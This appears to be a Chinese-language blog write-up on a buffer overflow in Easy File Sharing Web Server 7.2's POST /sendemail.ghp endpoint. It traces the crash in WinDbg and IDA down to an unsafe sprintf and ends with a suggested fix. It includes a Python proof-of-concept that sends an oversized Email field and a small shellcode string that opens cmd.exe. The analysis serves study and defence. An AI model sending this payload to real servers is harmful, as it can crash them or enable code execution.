Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析

简介

看到这个软件,之前不是GET请求缓冲区溢出吗?
(附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749

这次有个POST,看看有没有新鲜的东西啊!

参考:https://www.exploit-db.com/exploits/42165/

实验环境

WinXP sp3 中文版
EFS Web Server7.2
windbg
IDA
mona
python 2.7

漏洞分析

修改exp为poc:

import httplib

server = "127.0.0.1"

#Shellcode Open CMD.exe
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")

payload = "A" * 5000

# Server address and POrt
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()

httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % payload)

response = httpServ.getresponse()

httpServ.close()

先复现一下:

0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll - 
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0  cmp     dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????

一看跟上次的位置一样呀,都是sqlite3!sqlite3_errcode+0x8e

看下栈信息

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0205616c 004968f4 00000001 00000000 02056198 sqlite3!sqlite3_declare_vtab+0x3282
0205618c 004975a3 020561b0 00000000 0012b9d0 fsws+0x968f4
00000000 00000000 00000000 00000000 00000000 fsws+0x975a3

跟上次好像差不多,直接在0049759E下断

0:002> bp 0049759E
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:002> bl
 0 e 0049759e     0001 (0001)  0:**** fsws+0x9759e
0:002> g
ModLoad: 719c0000 719fe000   C:\WINDOWS\System32\mswsock.dll
ModLoad: 76ef0000 76f17000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 76d30000 76d48000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 76f80000 76f88000   C:\WINDOWS\System32\winrnr.dll
ModLoad: 76f90000 76f96000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 01a10000 01a20000   C:\WINDOWS\DBFilter.dll
ModLoad: 01a20000 01c4c000   C:\WINDOWS\SurfGd.dll
ModLoad: 60fd0000 61025000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a00000 71a08000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 5fdd0000 5fe24000   C:\WINDOWS\system32\NETAPI32.DLL
ModLoad: 68000000 68036000   C:\WINDOWS\system32\rsaenh.dll
Breakpoint 0 hit
eax=020561b0 ebx=ffffff01 ecx=0205720c edx=020561b8 esi=0205720c edi=01568eec
eip=0049759e esp=02056194 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9759e:
0049759e e82df3ffff      call    fsws+0x968d0 (004968d0)
0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02056190 020561b0 020561b8 0012b9d0 02057624 fsws+0x9759e
02056194 020561b8 0012b9d0 02057624 ffffffff 0x20561b0
020561b0 01375910 656c6573 2a207463 6f726620 0x20561b8
00000000 00000000 00000000 00000000 00000000 0x1375910
0:005> dc 020561b0 l 100
020561b0  00000000 01375910 656c6573 2a207463  .....Y7.select *
020561c0  6f726620 7173206d 6261746c 7720656c   from sqltable w
020561d0  65726568 616d6520 273d6c69 41414141  here email='AAAA
020561e0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
020561f0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056200  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056210  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056220  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056230  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056240  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
。。。。。。。。。
。。。。。。。。。
。。。。。。。。。
。。。。。。。。。

可以看到传给函数0049759E的第一个参数指向的值是一条sql语句,而且还很多我们传过来的AAAA。。。

那什么时候这里的栈被填成这样了呢,我们对020561e0下写入断点:

0:005> ba w4 020561e0
0:005> g
Breakpoint 0 hit
eax=00000041 ebx=00001383 ecx=02056160 edx=020561e0 esi=01568e69 edi=02056134
eip=00500df0 esp=02055ebc ebp=02055ebc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
fsws+0x100df0:
00500df0 ff01            inc     dword ptr [ecx]      ds:0023:02056160=020561e0

果然一样的东西,这是write_char函数,上层应该是调用了sprintf函数什么的

到底是不是,我们继续追梦,看看栈先

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02055ebc 00500e69 00000041 02056160 02056134 fsws+0x100df0
02056148 004f9698 02056160 005a2859 0205619c fsws+0x100e69
02056180 0049758f 020561b8 005a283c 01374678 fsws+0xf9698
02056184 020561b8 005a283c 01374678 01374358 fsws+0x9758f
02056188 005a283c 01374678 01374358 01568e64 0x20561b8
020561b8 2a207463 6f726620 7173206d 6261746c fsws+0x1a283c
020561bc 6f726620 7173206d 6261746c 7720656c 0x2a207463
020561c0 7173206d 6261746c 7720656c 65726568 0x6f726620
020561c4 6261746c 7720656c 65726568 616d6520 0x7173206d
020561c8 7720656c 65726568 616d6520 273d6c69 0x6261746c
02056220 00000000 00000000 00000000 00000000 COMCTL32!CReBar::_WndProc+0x955 (FPO: [Non-Fpo])

ida看看004f9698 在哪,果然在sprintf里面,跟上次分析的一样的啊

.text:004F966A ; int sprintf(char *, const char *, ...)
.text:004F966A _sprintf        proc near               ; CODE XREF: sub_401520+36p
.text:004F966A                                         ; sub_401B70+35p ...
.text:004F966A
.text:004F966A var_20          = FILE ptr -20h
.text:004F966A arg_0           = dword ptr  8
.text:004F966A arg_4           = dword ptr  0Ch
.text:004F966A arg_8           = dword ptr  10h
.text:004F966A
.text:004F966A                 push    ebp
.text:004F966B                 mov     ebp, esp
.text:004F966D                 sub     esp, 20h
.text:004F9670                 mov     eax, [ebp+arg_0]
.text:004F9673                 push    esi
.text:004F9674                 mov     [ebp+var_20._base], eax
.text:004F9677                 mov     [ebp+var_20._ptr], eax
.text:004F967A                 lea     eax, [ebp+arg_8]
.text:004F967D                 mov     [ebp+var_20._flag], 42h
.text:004F9684                 push    eax             ; int
.text:004F9685                 lea     eax, [ebp+var_20]
.text:004F9688                 push    [ebp+arg_4]     ; int
.text:004F968B                 mov     [ebp+var_20._cnt], 7FFFFFFFh
.text:004F9692                 push    eax             ; FILE *
.text:004F9693                 call    sub_500640
.text:004F9698                 add     esp, 0Ch
.........
.........
.........

我们在调用sprintf前下断断点,查看第二个参数,格式化字符串,有3个%s,那第五个参数就是我们的email值:AAAAAA…..

0:005> bp 0049758A
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:005> g
Breakpoint 0 hit
eax=01374678 ebx=ffffff01 ecx=020561b8 edx=01374358 esi=0205720c edi=01568e64
eip=0049758a esp=02056188 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9758a:
0049758a e8db200600      call    fsws+0xf966a (004f966a)
0:005> dd esp
02056188  020561b8 005a283c 01374678 01374358
02056198  01568e64 0012b9d0 02057624 ffffffff
020561a8  01374678 01374358 00000000 01375910
020561b8  0000005c 656c6573 2a207463 6f726620
020561c8  7173206d 6261746c 0020656c 00000000
020561d8  00000000 00000000 00000000 00000000
020561e8  00000000 00000000 00000000 00000000
020561f8  00000000 00000000 00000000 00000000
0:005> dc 005a283c l8
005a283c  656c6573 2a207463 6f726620 7325206d  select * from %s
005a284c  65687720 25206572 25273d73 00002773   where %s='%s'..
0:005> dc 01568e64 
01568e64  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e74  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e84  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e94  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ea4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568eb4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ec4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ed4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

也可以看看第一二个参数是不是我们在崩溃前的eax指向的值看到的

0:005> dc 01374678  l2
01374678  746c7173 656c6261                    sqltable

表确实是这个sqltable

虾米可看到字段也是email,注意下面有个00截断了的哦

0:005> dc 01374358 l2
01374358  69616d65 452d006c                    email.-E

漏洞利用

我这里已经讲了很多了
http://blog.csdn.net/u012763794/article/details/66970749

漏洞修复

使用安全的snprintf,或者对字符串长度进行限制

漏洞总结

通过这个温故,这个软件所有使用了sprintf函数的地方可能都有问题,只要你找到触发的方法就行了,漏洞利用都是大同小异
此外,漏洞利用无论是覆盖返回地址还是覆盖SEH都有一些坑,更多请看http://blog.csdn.net/u012763794/article/details/66970749漏洞利用部分内容。

posted @   SEC.VIP_网络安全服务  阅读(246)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示